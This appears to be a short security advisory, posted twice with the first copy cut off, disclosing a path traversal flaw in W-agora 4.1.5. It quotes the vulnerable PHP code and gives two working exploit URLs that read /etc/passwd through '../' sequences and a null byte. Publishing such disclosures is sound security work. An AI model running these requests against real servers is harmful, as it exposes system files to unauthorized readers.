==============================
====Advisory For W-agora======
==============================
- Product : w-agora
- Tested version : version 4.1.5
- Website : http://www.w-agora.net
- Discovery By Sonyy
- Vendor Status: informed
- Problem : A security vulnerability in W-agora
The bug :
==========
index.php
if (empty($bn)) {
# No forum selected -> default to 'site' configuration
$site = empty($site) ? "agora" : $site;
==Shell Security Team==
=======================
==============================
====Advisory For W-agora======
==============================
- Product : w-agora
- Tested version : version 4.1.5
- Website : http://www.w-agora.net
- Discovery By Sonyy
- Vendor Status: informed
- Problem : A security vulnerability in W-agora
The bug :
==========
index.php
if (empty($bn)) {
# No forum selected -> default to 'site' configuration
$site = empty($site) ? "agora" : $site;
$cfg_file = "${cfg_dir}/site_${site}.${ext}";
$expnd = "all";
} else {
$cfg_file = "${cfg_dir}/${bn}.${ext}";
}
Exploit :
=========
index.php
http://www.w-agora.net/current/index.php?site=demos&bn=../../../../../..
/../../../../etc/passwd%00
And modules.php
http://www.w-agora.net/current/modules.php?mod=fm&file=../../../../../..
/../../../../etc/passwd%00&bn=fm_d1
Any Question :
==============
Sonyy --> Sonico60 (at) hotmail (dot) com [email concealed]
[ reply ]